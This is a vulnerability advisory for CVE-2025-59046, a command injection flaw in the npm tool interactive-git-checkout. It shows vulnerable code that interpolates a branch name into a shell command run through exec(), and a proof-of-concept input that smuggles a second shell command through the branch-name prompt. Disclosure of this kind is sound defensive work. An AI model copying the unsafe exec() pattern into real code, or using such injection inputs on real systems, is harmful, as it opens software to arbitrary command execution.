CVE-2025-59046
interactive-git-checkout has a Command Injection vulnerability
Description
The npm package `interactive-git-checkout` is an interactive command-line tool that lets users check out a git branch by prompting for the branch name on the command line. It is available as an npm package and can be installed via `npm install -g interactive-git-checkout`.

Resources:

* Project's npm package: https://www.npmjs.com/package/interactive-git-checkout

## Command Injection Vulnerability

The `interactive-git-checkout` tool is vulnerable to command injection because it passes the user-supplied branch name to the `git checkout` command through the Node.js `child_process` module's `exec()` function, which runs the assembled string in a shell, without any input validation or sanitization. The following vulnerable code snippet demonstrates the issue:

```js
const { exec: execCb } = require('child_process');
const { promisify } = require('util');

const exec = promisify(execCb);

module.exports = async (targetBranch) => {
  // targetBranch is interpolated, unescaped, into a command line that exec() hands to a shell
  const { stdout, stderr } = await exec(`git checkout ${targetBranch}`);
  process.stderr.write(stderr);
  process.stdout.write(stdout);
};
```

## Exploit Proof of Concept

1. Install the `interactive-git-checkout` package (as suggested by the package's README):

```bash
npm install --global interactive-git-checkout
```

2. Run the executable exposed by the installed package:

```bash
$ igc
```

3. When prompted, enter the following branch name:

```bash
hello ; echo 'Command Injection Vulnerability Exploited!' > /tmp/command-injection.txt; #
```

## Vulnerable versions

All versions of `interactive-git-checkout` are vulnerable to this issue, up to and including the latest version, `1.1.4`.

# Author

Liran Tal
How to fix CVE-2025-59046
No patched version has been released yet. Consider removing the affected package, or refer to the upstream advice in the links below.
- No patched version listed
Is CVE-2025-59046 being exploited?
Low: EPSS is 0.5%, and no large-scale exploitation activity has been observed.
Affected packages (1)
- from 0, <= 1.1.4